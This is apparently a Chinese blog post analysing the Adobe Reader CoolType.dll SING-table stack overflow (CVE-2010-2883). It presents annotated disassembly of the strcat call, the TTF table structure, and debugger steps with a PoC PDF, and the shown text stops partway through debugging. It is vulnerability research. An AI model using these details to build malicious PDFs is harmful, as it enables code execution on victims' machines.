<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="xiaoeryu">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://xiaoeeyu.github.io/2021/05/19/cve-2010-2883-adobe-reader-ttf字体sing表栈溢出漏洞/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="0x1：漏洞描述​	CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞，用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 0x2：分析环境    推荐使用的环境 备注    操作系统 Windows XP SP3 简体中文版   虚拟机 VMware    调试器 OD">
<meta property="og:type" content="article">
<meta property="og:title" content="CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞">
<meta property="og:url" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="xiaoeryu">
<meta property="og:description" content="0x1：漏洞描述​	CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞，用户受骗打开了特制的PDF文件就有可能导致执行任意代码。 0x2：分析环境    推荐使用的环境 备注    操作系统 Windows XP SP3 简体中文版   虚拟机 VMware    调试器 OD">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201013235707085.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201028234333765.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201028234401837.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109215720617.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201029235903195.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201104211542610.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201104211659428.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109201540699.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109211515283.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109215720617.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109233420281.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109235316562.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109235551091.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110000836183.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110001742314.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110002213991.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110002529870.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110002842137.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110004506163.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110004824363.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005023971.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005125716.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005307611.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005501083.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005720538.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110005847673.png">
<meta property="og:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201110010014506.png">
<meta property="article:published_time" content="2021-05-19T14:42:44.000Z">
<meta property="article:modified_time" content="2023-11-17T11:38:22.660Z">
<meta property="article:author" content="xiaoeryu">
<meta property="article:tag" content="Adobe Reader漏洞">
<meta property="article:tag" content="漏洞分析">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xiaoeeyu.github.io/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201013235707085.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/rabete.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/rabete.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/rabete.jpg">
    <!--- Page Info-->
    
    <title>
        
            CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞 | xiaoeryu
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"xiaoeeyu.github.io","root":"/","language":"zh-CN","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":4,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/ball-0101.jpg","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-jxl31y.png","dark":"/images/wallhaven-o5762l.png"},"title":"XIAOERYU","subtitle":{"text":["明心见性，拨云见日","Don't wait, to create"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/xiaoeeyu","instagram":null,"zhihu":null,"twitter":null,"email":"xiaoeryu@163.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
</head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
                <a class="logo-image h-8 w-8 sm:w-10 sm:h-10 mr-3" href="/">
                    <img src="/images/rabete.jpg" class="w-full h-full rounded-sm">
                </a>
            
            <a class="logo-title" href="/">
                
                xiaoeryu
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    首页
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    归档
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                首页
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                归档
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">92</div>
        <div class="label text-third-text-color text-sm">标签</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">14</div>
        <div class="label text-third-text-color text-sm">分类</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">112</div>
        <div class="label text-third-text-color text-sm">文章</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">CVE-2010-2883 Adobe Reader TTF字体SING表栈溢出漏洞</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/rabete.jpg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">xiaoeryu</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv5</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2021-05-19 22:42:44</span>
        <span class="mobile">2021-05-19 22:42:44</span>
        <span class="hover-info">创建</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-11-17 19:38:22</span>
            <span class="mobile">2023-11-17 19:38:22</span>
            <span class="hover-info">更新</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/Win%E9%80%86%E5%90%91/">Win逆向</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Adobe-Reader%E6%BC%8F%E6%B4%9E/">Adobe Reader漏洞</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h3 id="0x1：漏洞描述"><a href="#0x1：漏洞描述" class="headerlink" title="0x1：漏洞描述"></a>0x1：漏洞描述</h3><p>​	CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞，用户受骗打开了特制的PDF文件就有可能导致执行任意代码。</p>
<h3 id="0x2：分析环境"><a href="#0x2：分析环境" class="headerlink" title="0x2：分析环境"></a>0x2：分析环境</h3><table>
<thead>
<tr>
<th align="left"></th>
<th>推荐使用的环境</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td align="left">操作系统</td>
<td>Windows XP SP3</td>
<td>简体中文版</td>
</tr>
<tr>
<td align="left">虚拟机</td>
<td>VMware</td>
<td></td>
</tr>
<tr>
<td align="left">调试器</td>
<td>OD</td>
<td></td>
</tr>
<tr>
<td align="left">反汇编器</td>
<td>IDA Pro</td>
<td>6.8</td>
</tr>
<tr>
<td align="left">漏洞软件</td>
<td>Adobe Reader</td>
<td>9.3.4</td>
</tr>
</tbody></table>
<span id="more"></span>

<h3 id="0x3：基于字符串定位的漏洞分析方法"><a href="#0x3：基于字符串定位的漏洞分析方法" class="headerlink" title="0x3：基于字符串定位的漏洞分析方法"></a>0x3：基于字符串定位的漏洞分析方法</h3><p>​	用IDA反汇编CoolType.dll库，查看字符串可发现”SING”字体，因为该字符串是漏洞解析出错的地方，直接定位进去即可查看该库对string表格的解析方式，==主要是strcat造成的溢出漏洞==：</p>
<pre><code class="asm">.text:0803DCF9
.text:0803DCF9 ; =============== S U B R O U T I N E =======================================
.text:0803DCF9
.text:0803DCF9 ; Attributes: bp-based frame fpd=108h
.text:0803DCF9
.text:0803DCF9 sub_803DCF9     proc near               ; CODE XREF: sub_803A3B2+55p
.text:0803DCF9                                         ; sub_803DFF4+28p ...
.text:0803DCF9
.text:0803DCF9 var_160         = byte ptr -160h
.text:0803DCF9 var_140         = dword ptr -140h
.text:0803DCF9 var_138         = dword ptr -138h
.text:0803DCF9 var_134         = dword ptr -134h
.text:0803DCF9 var_130         = dword ptr -130h
.text:0803DCF9 var_12C         = dword ptr -12Ch
.text:0803DCF9 var_128         = dword ptr -128h
.text:0803DCF9 var_124         = dword ptr -124h
.text:0803DCF9 var_120         = dword ptr -120h
.text:0803DCF9 var_119         = byte ptr -119h
.text:0803DCF9 var_114         = dword ptr -114h
.text:0803DCF9 var_10C         = dword ptr -10Ch
.text:0803DCF9 var_108         = byte ptr -108h
.text:0803DCF9 var_4           = dword ptr -4
.text:0803DCF9 arg_0           = dword ptr  8
.text:0803DCF9 arg_4           = dword ptr  0Ch
.text:0803DCF9 arg_8           = dword ptr  10h
.text:0803DCF9 arg_C           = dword ptr  14h
.text:0803DCF9
.text:0803DCF9                 push    ebp
.text:0803DCFA                 sub     esp, 104h	;分配栈空间0x104
.text:0803DD00                 lea     ebp, [esp-4]	;后面的strcat会把执行结果保存在ebp中
.text:0803DD04                 mov     eax, ___security_cookie
.text:0803DD09                 xor     eax, ebp
.text:0803DD0B                 mov     [ebp+108h+var_4], eax
.text:0803DD11                 push    4Ch
.text:0803DD13                 mov     eax, offset sub_8184A54
.text:0803DD18                 call    __EH_prolog3_catch
.text:0803DD1D                 mov     eax, [ebp+108h+arg_C]
.text:0803DD23                 mov     edi, [ebp+108h+arg_0]
.text:0803DD29                 mov     ebx, [ebp+108h+arg_4]
.text:0803DD2F                 mov     [ebp+108h+var_130], edi
.text:0803DD32                 mov     [ebp+108h+var_138], eax
.text:0803DD35                 call    sub_804172C
.text:0803DD3A                 xor     esi, esi
.text:0803DD3C                 cmp     dword ptr [edi+8], 3
.text:0803DD40                 mov     [ebp+108h+var_10C], esi
.text:0803DD43                 jz      loc_803DF00
.text:0803DD49                 mov     [ebp+108h+var_124], esi
.text:0803DD4C                 mov     [ebp+108h+var_120], esi
.text:0803DD4F                 cmp     dword ptr [edi+0Ch], 1
.text:0803DD53                 mov     byte ptr [ebp+108h+var_10C], 1
.text:0803DD57                 jnz     loc_803DEA9
.text:0803DD5D                 push    offset aName    ; "name"
.text:0803DD62                 push    edi             ; int
.text:0803DD63                 lea     ecx, [ebp+108h+var_124]
.text:0803DD66                 mov     [ebp+108h+var_119], 0
.text:0803DD6A                 call    sub_80217D7
.text:0803DD6F                 cmp     [ebp+108h+var_124], esi
.text:0803DD72                 jnz     short loc_803DDDD
.text:0803DD74                 push    offset aSing    ; "SING"
.text:0803DD79                 push    edi             ; int
.text:0803DD7A                 lea     ecx, [ebp+108h+var_12C]	;指向sing表入口
.text:0803DD7D                 call    sub_8021B06			   ;处理SING表
.text:0803DD82                 mov     eax, [ebp+108h+var_12C]
.text:0803DD85                 cmp     eax, esi					;判断是否为空
.text:0803DD87                 mov     byte ptr [ebp+108h+var_10C], 2
.text:0803DD8B                 jz      short loc_803DDC4		 ;这里不跳转
.text:0803DD8D                 mov     ecx, [eax]		;字体资源版本号，这里为1.0版本即00 10 00 00
.text:0803DD8F                 and     ecx, 0FFFFh
.text:0803DD95                 jz      short loc_803DD9F		 ;这里跳转
.text:0803DD97                 cmp     ecx, 100h
.text:0803DD9D                 jnz     short loc_803DDC0
.text:0803DD9F
.text:0803DD9F loc_803DD9F:                              ; CODE XREF: sub_803DCF9+9Cj
.text:0803DD9F                 add     eax, 10h			;相对string表偏移0x10处找到uniqueName
.text:0803DDA2                 push    eax               ; char * uniqueName域
.text:0803DDA3                 lea     eax, [ebp+108h+var_108]
.text:0803DDA6                 push    eax               ; char * 目的地址是一段固定大小的栈空间
.text:0803DDA7                 mov     [ebp+108h+var_108], 0
.text:0803DDAB                 call    strcat			;造成溢出！！
</code></pre>
<ul>
<li>由上可知，Adobe Reader在调用strcat的时候，未对uniqueName字段的字符串长度进行检测，将其直接复制到固定大小的栈空间中，最终导致栈溢出。</li>
</ul>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201013235707085.png" class="" title="image-20201013235707085">

<h3 id="0x4：样本Exploit技术分析"><a href="#0x4：样本Exploit技术分析" class="headerlink" title="0x4：样本Exploit技术分析"></a>0x4：样本Exploit技术分析</h3><p>​	用PdfStreamDumperd找到TTF并保存至本地</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201028234333765.png" class="" title="image-20201028234333765">

<center>找到TTF位置</center>

<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201028234401837.png" class="" title="image-20201028234401837">

<center>将TTF文件保存至本地</center>

<p>​	TableEntry结构数据</p>
<pre><code class="c"> typedef sturct_SING
 {
     char tag[4];	//"SING"
     ULONG checkSum;//校验和
     ULONG offset;	//相对文件偏移，0000011C
     ULONG length;	//数据长度
 } TableEntry;
</code></pre>
<p>​	保存下来之后我们可以用010Edit加载TTF模板来查看一下文件的结构，找到SING表的真实数据，</p>
<p>​	从TableEntry结构入口偏移0x11C即是SING表的真实数据，从<strong>00 00 01 00</strong> 开始的部分，接着再偏移0x10即可找到uniqueName域</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201109215720617.png" class="" title="image-20201109215720617">

<center>uniqueName域</center>

<p>​		<strong>00 00 01 00</strong> 表示版本号，偏移0x10开始为uniqueName字段，大小为28字节且以0x00结尾。但是在CoolType.dll中，使用strcat对这个位置进行操作时没有判断长度，所以我们可以构造超长的uniqueName进行栈溢出。</p>
<h3 id="0x05：动态调试"><a href="#0x05：动态调试" class="headerlink" title="0x05：动态调试"></a>0x05：动态调试</h3><p>​	用OD加载Adobe Reader 按F9直接运行，运行起来之后在<strong>0x0803DD74</strong>（前面我们通过IDA找到的加载SING表的位置）下断点，然后打开poc.pdf。程序会断在此处。</p>
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/19/CVE-2010-2883-Adobe-Reader-TTF%E5%AD%97%E4%BD%93SING%E8%A1%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E/image-20201029235903195.png" class="" title="image-20201029235903195">

<p>​	然后向下单步执行，在0X0803DD7A执行完之后，可以看到ECX被从栈中赋了一个值</p>
